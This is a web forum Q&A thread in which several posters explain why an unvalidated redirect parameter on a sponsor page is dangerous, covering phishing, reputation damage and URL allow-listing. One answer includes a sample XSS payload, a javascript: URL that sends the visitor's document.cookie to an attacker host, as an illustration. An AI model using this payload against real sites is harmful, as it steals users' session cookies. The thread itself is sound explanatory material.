tags:

views:

209

answers:

3
+2  Q: 

Can you find the web security issue here?

I have a webpage that redirects to another webpage like this:

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html

Then the Sponsor.php page displays an ad with a link saying "Continue to your page" that links to the passed in RedirectPage. Are there security/spoofing issues that could come from this? What is the best way to handle this? (note that the user is not logged in to either site)

A: 

This is definitely a security risk. You should avoid using in-URL variables when security is involved.

While nothing is totally secure, this is a much better way of handling this issue: http://www.webmasterworld.com/forum88/2910.htm

PHLAK  2008-10-17 01:45:15
Just out of curiosity, why do you label this a security risk? The reason I ask is that the OP explicitly stated that there is no logon information at risk.
Chris Lively  2008-10-27 01:25:54
A: 

If sponsor.php allows any value into RedirectPage AND ads imply an endorsement, or encourage people to think that they are on the right track you would be opening it to be part of a phishing attack. What's worse, you would probably be profiting from those attacks, which would likely make people rather displeased.

Keeping a list of permitted URLs (or patterns that they can follow) would go a long way to prevent problems.

acrosman  2008-10-17 01:46:52
+8  A: 

It's a big problem. If I send you a link that looks like this:

 http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14

You're going to think "Oh, CNN, that's a legit site", and you'll open it and click the 'Continue to Your Page' link. And then you'll be on one of the nastiest porn sites on the net and it'll have a giant booming male voice announcing to all your co-workers "Hot Damn I Want to !@$@#$ Your !(&¤&^$§ until I can't ¡⌐^(!#~~&$^#!@$!!" and you'll have to explain to your boss "I thought it was CNN!"

The hole here is your reputation. Blind redirects like this are dangerous.

And that's just one hole. How about this?

 http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie

Now I've XSS-ed your site and stolen your user's cookies. Sure, you say there's no login info, but how about session data? Or when you add a login later, or someone else in your company uses this page a year later where users are logged in.

Tom Ritter  2009-07-06 20:37:38
Excellent. :)abcd
landon9720  2009-07-06 20:55:24

related questions

Autosizing Textarea
Regular expression for parsing links from a webpage?
What are good tools for creating compiled HTML help files (.chm)?
Looking for WYSIWYG HTML editor
Any reason not to start using the HTML 5 doctype?
HTML comments break down
HTML Comments Markup
Setting a div's height in HTML with CSS
Wrapping lists into columns
Is a "Confirm Email" input good practice when user changes email address?
<XMP> Tag
HTML version choice
Options for HTML scraping?
How do you disable browser Autocomplete on web form field / input tag?
How do I make a checkbox toggle from clicking on the text label as well?
Html CSS Editor
Wordpress theme development offline tools
How do I give my web sites an icon for iPhone?
In HTML, how to word-break on a dash?
Detecting font in JavaScript
How do you test layout design across multiple browsers/OSs?
How do I print an HTML document from a web service?
Multiple submit buttons on a HTML form
How can I determine a web user's time zone?
Why doesn't the percentage width child in absolutely positioned parent work in IE7?